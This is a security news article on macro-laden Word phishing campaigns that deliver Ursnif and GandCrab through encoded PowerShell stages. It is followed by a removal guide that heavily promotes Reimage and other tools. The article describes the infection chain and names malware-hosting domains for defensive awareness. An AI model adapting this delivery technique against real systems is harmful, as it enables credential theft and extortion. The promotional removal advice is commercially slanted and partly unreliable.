New MS Word macros virus campaign : GandCrab ransomware and Ursnif virus


Security researchers have discovered two separate malware campaigns, one of which is distributing the Ursnif data-stealing trojan and the GandCrab ransomware in the wild, whereas the second one is only infecting victims with Ursnif malware.

Though both malware campaigns appear to be a work of two separate cybercriminal groups, we find many similarities in them.

Both attacks start from phishing emails containing an attached Microsoft Word document embedded with malicious macros and then uses Powershell to deliver fileless malware.

Ursnif is a data-stealing malware that typically steals sensitive information from compromised computers with an ability to harvest banking credentials, browsing activities, collect keystrokes, system and process information, and deploy additional backdoors.

Discovered earlier last year, GandCrab is a widespread ransomware threat that, like every other ransomware in the market, encrypts files on an infected system and insists victims to pay a ransom in digital currency to unlock them.

Its developers ask payments primarily in DASH, which is more complex to track.

MS Docs + VBS macros = Ursnif and GandCrab Infection

The first malware campaign distributing two malware threats was discovered by security researchers at Carbon Black who located approximately 180 variants of MS Word documents in the wild that target users with malicious VBS macros.

If successfully executed, the malicious VBS macro runs a PowerShell script, which then uses a series of techniques to download and execute both Ursnif and GandCrab on the targeted systems.

microsoft office docs macros malware ransomware

The PowerShell script is encoded in base64 that executes the next stage of infection which is responsible for downloading the main malware payloads to compromise the system.

The first payload is a PowerShell one-liner that evaluates the architecture of the targeted system and then accordingly downloads an additional payload from the Pastebin website, which is executed in the memory, making it difficult for traditional anti-virus techniques to detect its activities.

“This PowerShell script is a version of the Empire Invoke-PSInject module, with very few modifications,” Carbon Black researchers said. “The script will take an embedded PE [Portable Executable] file that has been base64 encoded and inject that into the current PowerShell process.”

The final payload then installs a variant of the GandCrab ransomware on the victim’s system, locking them out of their system until they pay a ransom in digit currency.

Meanwhile, the malware also downloads a Ursnif executable from a remote server and once executed, it will fingerprint the system, monitor web browser traffic to collect data, and then send it out to the attackers’ command and control (C&C) server.

“However, numerous Ursnif variants were hosted on the bevendbrec[.]com site during this campaign. Carbon Black was able to discover approximately 120 different Ursnif variants that were being hosted from the domains iscondisth[.]com and bevendbrec[.]com,” the researchers said.

MS Docs + VBS macros = Ursnif Data-Stealing Malware

Similarly, the second malware campaign that was spotted by security researchers at Cisco Talos leverages a Microsoft Word document containing a malicious VBA macro to deliver another variant of same Ursnif malware.

microsoft office docs macros malware

This malware attack also compromises targeted systems in multiple stages, starting from phishing emails to running malicious PowerShell commands to gain fileless persistence and then downloading and installing Ursnif data-stealing computer virus.

“There are three parts to the [PowerShell] command. The first part creates a function that is later used to decode base64 encoded PowerShell. The second part creates a byte array containing a malicious DLL,” Talos researchers explained.

“The third part executes the base64 decode function created in the first part, with a base64 encoded string as the parameter to the function. The returned decoded PowerShell is subsequently executed by the shorthand Invoke-Expression (iex) function.”

Once executed on the victim computer, the malware collects information from the system, puts into a CAB file format, and then sends it to its command-and-control server over HTTPS secure connection.

Talos researchers have published a list of indicators of compromise (IOCs), along with the names of payload file names dropped on compromised machines, on their blog post that can help you detect and stop the Ursnif malware before it infects your network.

Remove Ursnif

Ursnif virus is a trojan horse used to steal sensitive data by recording users’ keystrokes

Ursnif trojan

Ursnif virus is a data-stealing trojan which you need to get rid of until it stole your money from bank accounts too.

The Ursnif virus is a dangerous Trojan horse that has been used to steal users’ private data. Once inside the system, this trojan virus launches the malicious svchost.exe and explorer.exe processes which are used to hide its presence on the system.

Additionally, this multifunctional virus starts numerous activities behind the victim’s back, including the distribution of other malware.

However, the main virus activity is related to data tracking.

Ursnif Trojan records every user’s keystroke and then shares the recorded information with its developer via the TOR network.

In most of the cases, the virus arrives in the system via the malicious email attachments.

NAMEUrsnif virus
TYPE Trojan horse
SYMPTOMS Collects various users’ data by tracking entered keystrokes
DISTRIBUTION Spam email attachments
ELIMINATION Use Reimage for Ursnif virus removal

This trojan is designed to record various sensitive information about the user, including banking data, logins or passwords, web browsing activity, information about the victim’s OS and device.

All this recorded information is additionally shared with virus developers. Ursnif keylogger can also delete itself from the system once it receives such command.

This is a virus that evolves constantly and is active since 2007.

It started targetting various financial institutions from the beginning and recently expanded to bigger organizations and changed distribution techniques and types of information to steal.

Ursnif virus is known to use different techniques as web injecting, man-in-the-browser or keylogging functionality.

The latest attacks were based on spear phishing emails and the fact that malware deleted copies of itself after the initial process. These facts make this banking trojan more dangerous and difficult to detect or analyze. 

This virus steals various data about the user personally, the device and other account information like:

  • information from your email accounts;
  • various information from your browsers;
  • logins and passwords of your social media accounts;
  • banking website logins and passwords.

Ursnif virus changes various registry keys to keep affecting the system. People behind this threat are focusing on getting revenue from various background activities on your system or even stealing your banking credentials so get your money directly out of your bank accounts.

While there is no way to spot the infiltration of this trojan horse, you should note that the main way used by this malware to get into the system is spam.

This trojan has been using seriously intelligent tactics that rely on infected Word documents that are filled with malicious macros.

If you have recently been asked to enable macros to check the content of email’s attachment, we highly recommend making sure that you are not infected.

The easiest way to do that is to scan the system with updated anti-spyware.

If you have any doubts either you have this malware on the device or not, check your system with updated anti-spyware and perform Ursnif removal to save your personal information.

To get rid of any viruses, use Reimage or any other anti-malware/anti-virus software.

We do not recommend performing the removal manually as this is a dangerous cyber threat which can be related to numerous different components hidden on your computer.

If you are blocked, reboot your PC to Safe Mode with networking first to disable the virus.

In most of the cases, antivirus programs detect the Ursnif Trojan horse as:

  • TR/Crypt.XPACK.Gen
  • Virus/Win32.PolyRansom.c
  • HEUR/Fakon.mwf
  • Win32.Doboc.Gen.1
  • Troj.Heur.LP.mE18
  • etc

Virus activity may lead you to serious privacy issues or money loss, so you need to remove Ursnif virus as soon as possible.

This type of cyber intruder can download and install other malware, including ransomware-type viruses, which could lead you to the data loss. There is no need to keep yourself at such a risk.

However, we should say one more time that you shouldn’t try to delete the trojan horse manually as you can lead your system to serious trouble by removing needed system components.

Ursnif virus
Ursnif virus is a keystroke-collecting malware that comes to your system via infected spam emails.

Spam email campaigns have been spreading this virus around as legitimate attachments asking to enable macros

Researchers have always been warning people that they shouldn’t believe anything on the internet what looks too good to be true.

That includes banner ads, in-text links, and spam emails as well.

Spam has also been a commonly used technique for trojan distribution. However,  when discussing Ursnif trojan horse, note that it relies on a slightly different distribution method.

The main way used by its developers to deliver this malicious threat relies on Word documents filled with malicious macros.

Once downloaded, such attachment asks you to enable macros and launches the virus in this way.

Other unique features about the distribution technique used by this banking trojan:

  • Compromised email accounts are used to reply to emails. The content of an email looks convincing;
  • The malicious payload is released when the user downloads the macro-filled documents. However, the Trojan waits until the attachment is closed to launch the process;
  • The safe-looking Word attachment also executes the PowerShell code. After this process, malware connects to URL and delivers the payload directly on the system;
  • The whole campaign is based on the fact that emails are sent from familiar services what increases the chances of people opening the infected file;
  • The most common pattern used to name these files is “the name of a local business or service_Statement”

You can avoid getting these intruders if you delete spam emails that are not from companies you know or services you do not use. Make sure to clean those suspicious emails from the email box more frequently and try to scan files before downloading them on the device. Pay more attention to these processes and do not open an email if you were not expecting that.

Best ways to remove Ursnif virus

When dealing with any silent intruder, anti-malware tools are the best option in virus elimination. However, trojans are one of the most dangerous cyber infections that can additionally install malware on the system.

To remove Ursnif Trojan virus and all related programs from the system, run a full system scan with updated anti-spyware. If you are blocked, check two methods given below that are supposed to help you disable the virus before a scan.

Tools that we recommend for Ursnif virus removal are the following ones: Reimage, Malwarebytes or Plumbytes Anti-Malware. Update these programs to their latest versions and run a full system scan to check your device thoroughly and get rid of any malware hiding on your system.

You can also use the anti-virus software of your choice, just make sure that it is a reputable and well-known tool. 


Please enter your comment!
Please enter your name here

Questo sito usa Akismet per ridurre lo spam. Scopri come i tuoi dati vengono elaborati.